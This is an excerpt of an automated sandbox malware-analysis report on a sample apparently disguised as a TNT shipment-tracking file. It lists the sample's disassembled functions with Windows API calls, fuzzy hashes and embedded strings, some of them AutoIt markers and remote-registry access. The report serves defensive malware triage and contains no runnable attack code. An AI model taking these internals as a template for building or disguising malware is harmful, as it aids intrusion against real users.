                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                    • String ID:
                                                    • API String ID: 3840717409-0
                                                    • Opcode ID: be5ea60a2efe790c4757051538d09616d60c4883b8304e1e3bf73563a2db3b53
                                                    • Instruction ID: f3942d122b44aec0e0fad55c5a1c1ede3a3bb3c292b264e06514df53c48f3492
                                                    • Opcode Fuzzy Hash: be5ea60a2efe790c4757051538d09616d60c4883b8304e1e3bf73563a2db3b53
                                                    • Instruction Fuzzy Hash: 9D412A79500208EFDB119F65DC48EAB7BB8EB9AB21F104068FD09D7261D7749A05EB60
                                                    APIs
                                                    • __wsplitpath.LIBCMT ref: 00F2DA10
                                                    • _wcscat.LIBCMT ref: 00F2DA28
                                                    • _wcscat.LIBCMT ref: 00F2DA3A
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F2DA4F
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F2DA63
                                                    • GetFileAttributesW.KERNEL32(?), ref: 00F2DA7B
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00F2DA95
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F2DAA7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                    • String ID: *.*
                                                    • API String ID: 34673085-438819550
                                                    • Opcode ID: 9110bc10ccf86dca9dd20709758d4755fcbf7bd4b74f49ef65990f00884a105f
                                                    • Instruction ID: 229251b18be3c2c2188cef3bc0644f340a8bf456d191cf790bf67e18a7a7b0c0
                                                    • Opcode Fuzzy Hash: 9110bc10ccf86dca9dd20709758d4755fcbf7bd4b74f49ef65990f00884a105f
                                                    • Instruction Fuzzy Hash: 8C81E4729043549FCB24DF64D844AAAB7E8FF89320F14882EF889D7211E731DD85DB52
                                                    APIs
                                                      • Part of subcall function 00EC2612: GetWindowLongW.USER32(?,000000EB), ref: 00EC2623
                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F4C1FC
                                                    • GetFocus.USER32 ref: 00F4C20C
                                                    • GetDlgCtrlID.USER32(00000000), ref: 00F4C217
                                                    • _memset.LIBCMT ref: 00F4C342
                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F4C36D
                                                    • GetMenuItemCount.USER32(?), ref: 00F4C38D
                                                    • GetMenuItemID.USER32(?,00000000), ref: 00F4C3A0
                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F4C3D4
                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F4C41C
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F4C454
                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00F4C489
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                    • String ID: 0
                                                    • API String ID: 1296962147-4108050209
                                                    • Opcode ID: cfb8269968b25811548d7102617ebf92587d00700ee5cb9c309b00969a7ca48a
                                                    • Instruction ID: 6475cd907ce0e6c0126ee92225ef109b3a5b3e56401b4441a8dee7b8e3f285af
                                                    • Opcode Fuzzy Hash: cfb8269968b25811548d7102617ebf92587d00700ee5cb9c309b00969a7ca48a
                                                    • Instruction Fuzzy Hash: 5981BE716093059FD750CF14C984A7BBBE8FB88724F00592EFE99972A1D770D904EBA2
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 00F3738F
                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F3739B
                                                    • CreateCompatibleDC.GDI32(?), ref: 00F373A7
                                                    • SelectObject.GDI32(00000000,?), ref: 00F373B4
                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F37408
                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00F37444
                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00F37468
                                                    • SelectObject.GDI32(00000006,?), ref: 00F37470
                                                    • DeleteObject.GDI32(?), ref: 00F37479
                                                    • DeleteDC.GDI32(00000006), ref: 00F37480
                                                    • ReleaseDC.USER32(00000000,?), ref: 00F3748B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                    • String ID: (
                                                    • API String ID: 2598888154-3887548279
                                                    • Opcode ID: 02d4c9b37970d74e673ee31240930f3e9362cd7d5107b07712024d9852402f76
                                                    • Instruction ID: 0e8232eae9779139ed3e0b6955b5ae54dca8d9c538d146830e8e87d165b2821c
                                                    • Opcode Fuzzy Hash: 02d4c9b37970d74e673ee31240930f3e9362cd7d5107b07712024d9852402f76
                                                    • Instruction Fuzzy Hash: 39516EB5904309EFCB24DFA8CC84EAEBBB9EF49320F14842DF95997210D771A844DB50
                                                    APIs
                                                      • Part of subcall function 00EE0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00EC6B0C,?,00008000), ref: 00EE0973
                                                      • Part of subcall function 00EC4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EC4743,?,?,00EC37AE,?), ref: 00EC4770
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00EC6BAD
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00EC6CFA
                                                      • Part of subcall function 00EC586D: _wcscpy.LIBCMT ref: 00EC58A5
                                                      • Part of subcall function 00EE363D: _iswctype.LIBCMT ref: 00EE3645
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                    • API String ID: 537147316-1018226102
                                                    • Opcode ID: fa9ced4a7c8e43d22b35ae8d3a657d1ef5fabad6b2767a3b8b1997e9af5ad58a
                                                    • Instruction ID: 12b8ebeff38da1848da7975b12a35bdb84f6451c5bd91081d0c5428403e74420
                                                    • Opcode Fuzzy Hash: fa9ced4a7c8e43d22b35ae8d3a657d1ef5fabad6b2767a3b8b1997e9af5ad58a
                                                    • Instruction Fuzzy Hash: 2202CF311083449FC714EF24C981EAFBBE5EF94314F10582DF59AA72A1DB31E98ACB52
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F22D50
                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00F22DDD
                                                    • GetMenuItemCount.USER32(00F85890), ref: 00F22E66
                                                    • DeleteMenu.USER32(00F85890,00000005,00000000,000000F5,?,?), ref: 00F22EF6
                                                    • DeleteMenu.USER32(00F85890,00000004,00000000), ref: 00F22EFE
                                                    • DeleteMenu.USER32(00F85890,00000006,00000000), ref: 00F22F06
                                                    • DeleteMenu.USER32(00F85890,00000003,00000000), ref: 00F22F0E
                                                    • GetMenuItemCount.USER32(00F85890), ref: 00F22F16
                                                    • SetMenuItemInfoW.USER32(00F85890,00000004,00000000,00000030), ref: 00F22F4C
                                                    • GetCursorPos.USER32(?), ref: 00F22F56
                                                    • SetForegroundWindow.USER32(00000000), ref: 00F22F5F
                                                    • TrackPopupMenuEx.USER32(00F85890,00000000,?,00000000,00000000,00000000), ref: 00F22F72
                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F22F7E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                    • String ID:
                                                    • API String ID: 3993528054-0
                                                    • Opcode ID: 6b62fc2424a1eca0b03a4cac46a99e96507b1c26750e430c6a752ae9e0bc2ff1
                                                    • Instruction ID: 157da36755ab08c3c6bb253c1fca0fa277c85674faddabf60c6f094356de9693
                                                    • Opcode Fuzzy Hash: 6b62fc2424a1eca0b03a4cac46a99e96507b1c26750e430c6a752ae9e0bc2ff1
                                                    • Instruction Fuzzy Hash: D471F671A00629BFEB618F54EC45FAABF64FF05324F140216F629AA1E0C7B55C20F791
                                                    APIs
                                                      • Part of subcall function 00EC7BCC: _memmove.LIBCMT ref: 00EC7C06
                                                    • _memset.LIBCMT ref: 00F1786B
                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F178A0
                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F178BC
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F178D8
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F17902
                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00F1792A
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F17935
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F1793A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                    • API String ID: 1411258926-22481851
                                                    • Opcode ID: b6fb38556c86fc7f9f1633b2fe217aeed495421db75d10d0422f0c9dea5cdebf
                                                    • Instruction ID: 1bcfbdb05b796da69666bdd4a14d200752c0af438748a158e7f4f4e69c844a48
                                                    • Opcode Fuzzy Hash: b6fb38556c86fc7f9f1633b2fe217aeed495421db75d10d0422f0c9dea5cdebf
                                                    • Instruction Fuzzy Hash: 50413872C1422DABCF11EBA4DD85EEEB7B8BF58310F404069E819B3161DA319D49DF90
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F3FDAD,?,?), ref: 00F40E31
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                    • API String ID: 3964851224-909552448
                                                    • Opcode ID: 788b46f45dae7b03493b57f62c3955f10e550d031b7e1519ce92e3c3ab056441
                                                    • Instruction ID: 898b99587209d9f454ebdf63eeba66cb50757bc575bcedd56034e73634e79854
                                                    • Opcode Fuzzy Hash: 788b46f45dae7b03493b57f62c3955f10e550d031b7e1519ce92e3c3ab056441
                                                    • Instruction Fuzzy Hash: 68419C3250424E8BCF10EF50D855AEE3BA4EF11320F148425FD592B292DBB19D9BEBA1
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00EFE2A0,00000010,?,Bad directive syntax error,00F4F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00F1F7C2
                                                    • LoadStringW.USER32(00000000,?,00EFE2A0,00000010), ref: 00F1F7C9
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                    • _wprintf.LIBCMT ref: 00F1F7FC
                                                    • __swprintf.LIBCMT ref: 00F1F81E
                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F1F88D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                    • API String ID: 1506413516-4153970271
                                                    • Opcode ID: e0999aaaa994760882d76e2dc309217b8f0e198344307b0e523dc5740a28f869
                                                    • Instruction ID: 1598512efdab82e8775ed0c23d1096f1e80660ef7403be3751c222f9d1ad11fd
                                                    • Opcode Fuzzy Hash: e0999aaaa994760882d76e2dc309217b8f0e198344307b0e523dc5740a28f869
                                                    • Instruction Fuzzy Hash: 5321753294021EEBCF11EF90CC09FED7775BF18310F04446AF519760A1DA729559EB51
                                                    APIs
                                                      • Part of subcall function 00EC7BCC: _memmove.LIBCMT ref: 00EC7C06
                                                      • Part of subcall function 00EC7924: _memmove.LIBCMT ref: 00EC79AD
                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F25330
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F25346
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F25357
                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F25369
                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F2537A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: SendString$_memmove
                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                    • API String ID: 2279737902-1007645807
                                                    APIs
                                                    Similarity
                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                    • String ID: 0.0.0.0
                                                    • API String ID: 208665112-3771769585
                                                    APIs
                                                    • timeGetTime.WINMM ref: 00F24F7A
                                                      • Part of subcall function 00EE049F: timeGetTime.WINMM(?,7694B400,00ED0E7B), ref: 00EE04A3
                                                    • Sleep.KERNEL32(0000000A), ref: 00F24FA6
                                                    • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00F24FCA
                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F24FEC
                                                    • SetActiveWindow.USER32 ref: 00F2500B
                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F25019
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F25038
                                                    • Sleep.KERNEL32(000000FA), ref: 00F25043
                                                    • IsWindow.USER32 ref: 00F2504F
                                                    • EndDialog.USER32(00000000), ref: 00F25060
                                                    Similarity
                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                    • String ID: BUTTON
                                                    • API String ID: 1194449130-3405671355
                                                    APIs
                                                      • Part of subcall function 00EC9837: __itow.LIBCMT ref: 00EC9862
                                                      • Part of subcall function 00EC9837: __swprintf.LIBCMT ref: 00EC98AC
                                                    • CoInitialize.OLE32(00000000), ref: 00F2D5EA
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F2D67D
                                                    • SHGetDesktopFolder.SHELL32(?), ref: 00F2D691
                                                    • CoCreateInstance.OLE32(00F52D7C,00000000,00000001,00F78C1C,?), ref: 00F2D6DD
                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F2D74C
                                                    • CoTaskMemFree.OLE32(?,?), ref: 00F2D7A4
                                                    • _memset.LIBCMT ref: 00F2D7E1
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00F2D81D
                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F2D840
                                                    • CoTaskMemFree.OLE32(00000000), ref: 00F2D847
                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00F2D87E
                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 00F2D880
                                                    Similarity
                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                    • String ID:
                                                    • API String ID: 1246142700-0
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000001), ref: 00F1C283
                                                    • GetWindowRect.USER32(00000000,?), ref: 00F1C295
                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00F1C2F3
                                                    • GetDlgItem.USER32(?,00000002), ref: 00F1C2FE
                                                    • GetWindowRect.USER32(00000000,?), ref: 00F1C310
                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00F1C364
                                                    • GetDlgItem.USER32(?,000003E9), ref: 00F1C372
                                                    • GetWindowRect.USER32(00000000,?), ref: 00F1C383
                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00F1C3C6
                                                    • GetDlgItem.USER32(?,000003EA), ref: 00F1C3D4
                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F1C3F1
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00F1C3FE
                                                    Similarity
                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                    • String ID:
                                                    • API String ID: 3096461208-0
                                                    APIs
                                                      • Part of subcall function 00EC1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00EC2036,?,00000000,?,?,?,?,00EC16CB,00000000,?), ref: 00EC1B9A
                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00EC20D3
                                                    • KillTimer.USER32(-00000001,?,?,?,?,00EC16CB,00000000,?,?,00EC1AE2,?,?), ref: 00EC216E
                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00EFBCA6
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EC16CB,00000000,?,?,00EC1AE2,?,?), ref: 00EFBCD7
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EC16CB,00000000,?,?,00EC1AE2,?,?), ref: 00EFBCEE
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EC16CB,00000000,?,?,00EC1AE2,?,?), ref: 00EFBD0A
                                                    • DeleteObject.GDI32(00000000), ref: 00EFBD1C
                                                    Similarity
                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                    • String ID:
                                                    • API String ID: 641708696-0
                                                    APIs
                                                      • Part of subcall function 00EC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00EC25EC
                                                    • GetSysColor.USER32(0000000F), ref: 00EC21D3
                                                    Similarity
                                                    • API ID: ColorLongWindow
                                                    • String ID:
                                                    • API String ID: 259745315-0
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,00F4F910), ref: 00F2A90B
                                                    • GetDriveTypeW.KERNEL32(00000061,00F789A0,00000061), ref: 00F2A9D5
                                                    • _wcscpy.LIBCMT ref: 00F2A9FF
                                                    Similarity
                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                    • API String ID: 2820617543-1000479233
                                                    APIs
                                                    Similarity
                                                    • API ID: __i64tow__itow__swprintf
                                                    • String ID: %.15g$0x%p$False$True
                                                    • API String ID: 421087845-2263619337
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F4716A
                                                    • CreateMenu.USER32 ref: 00F47185
                                                    • SetMenu.USER32(?,00000000), ref: 00F47194
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F47221
                                                    • IsMenu.USER32(?), ref: 00F47237
                                                    • CreatePopupMenu.USER32 ref: 00F47241
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F4726E
                                                    • DrawMenuBar.USER32 ref: 00F47276
                                                    Similarity
                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                    • String ID: 0$F
                                                    • API String ID: 176399719-3044882817
                                                    APIs
                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F4755E
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00F47565
                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F47578
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00F47580
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F4758B
                                                    • DeleteDC.GDI32(00000000), ref: 00F47594
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00F4759E
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F475B2
                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F475BE
                                                    Similarity
                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                    • String ID: static
                                                    • API String ID: 2559357485-2160076837
                                                    APIs
                                                    • _memset.LIBCMT ref: 00EE6E3E
                                                      • Part of subcall function 00EE8B28: __getptd_noexit.LIBCMT ref: 00EE8B28
                                                    • __gmtime64_s.LIBCMT ref: 00EE6ED7
                                                    • __gmtime64_s.LIBCMT ref: 00EE6F0D
                                                    • __gmtime64_s.LIBCMT ref: 00EE6F2A
                                                    • __allrem.LIBCMT ref: 00EE6F80
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EE6F9C
                                                    • __allrem.LIBCMT ref: 00EE6FB3
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EE6FD1
                                                    • __allrem.LIBCMT ref: 00EE6FE8
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EE7006
                                                    • __invoke_watson.LIBCMT ref: 00EE7077
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
